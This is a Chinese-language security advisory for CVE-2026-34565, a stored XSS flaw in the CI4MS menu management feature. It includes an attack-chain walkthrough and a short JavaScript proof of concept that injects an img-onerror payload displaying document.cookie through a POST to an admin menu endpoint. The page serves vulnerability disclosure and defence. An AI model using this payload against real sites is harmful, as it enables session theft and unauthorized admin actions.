IPBUF安全漏洞报告
English
CVE-2026-34565 CVSS 9.1 严重

CVE-2026-34565 CI4MS存储型XSS漏洞

披露日期: 2026-04-01
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34565
漏洞类型
存储型跨站脚本攻击 (Stored XSS)
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
CI4MS

相关标签

XSSCI4MSCodeIgniterWeb安全存储型XSSCVE-2026-34565

漏洞概述

CI4MS是基于CodeIgniter 4的CMS系统。在0.31.0.0版本之前,系统在菜单管理功能中添加文章时未能正确过滤用户输入。受影响数据被存储在服务器端,并在管理后台和前台导航菜单渲染时缺乏输出编码。攻击者可利用此存储型DOM型XSS漏洞注入恶意脚本,窃取管理员凭据或执行未授权操作。

技术细节

该漏洞源于CI4MS在0.31.0.0之前的版本中,菜单管理模块对用户输入的处理存在缺陷。具体而言,当通过Posts板块将文章数据添加至导航菜单时,系统未能对用户可控的输入参数实施有效的消毒处理。这些恶意数据被持久化存储于服务器端。当具有权限的用户(如管理员)访问后台仪表盘或访客浏览前台导航菜单时,系统在渲染页面时未进行适当的上下文输出编码,导致恶意脚本被浏览器直接解析执行。攻击者利用此存储型DOM XSS漏洞,可绕过传统的输入过滤,在受害者环境中执行任意JavaScript代码,进而窃取会话凭证、篡改数据或进行进一步的攻击。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标站点使用的是存在漏洞的CI4MS版本,并获取一个低权限账户。
STEP 2
2. 恶意输入
攻击者登录后台,在菜单管理功能中,通过Posts板块向导航菜单添加包含JavaScript代码的恶意数据。
STEP 3
3. 数据存储
由于系统未进行适当的清理和编码,恶意Payload被存储在服务器数据库中。
STEP 4
4. 触发漏洞
当管理员或其他用户访问后台仪表盘或前台页面时,系统从数据库读取并渲染受污染的菜单数据。
STEP 5
5. 执行攻击
浏览器解析渲染出的恶意脚本,攻击者获取受害者的Cookie或执行管理员权限下的操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Proof of Concept for CVE-2026-34565 (Stored XSS in CI4MS) // Target: Menu Management functionality // Malicious payload to be injected into the post data var payload = '<img src=x onerror=alert(document.cookie)>'; // Simulating the request to add a post to the navigation menu // Note: Actual endpoint and parameter names may vary based on CI4MS routing var xhr = new XMLHttpRequest(); xhr.open("POST", "/admin/menu/add", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // Sending the payload within the parameter responsible for post selection/display var params = "post_title=" + encodeURIComponent(payload) + "&menu_location=main"; xhr.onreadystatechange = function () { if (xhr.readyState === 4 && xhr.status === 200) { console.log("Payload injected successfully."); } }; xhr.send(params);

影响范围

CI4MS < 0.31.0.0

防御指南

临时缓解措施
若无法立即升级,应严格限制低权限用户访问菜单管理功能,并部署Web应用防火墙(WAF)以检测和拦截针对菜单参数的XSS攻击尝试。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表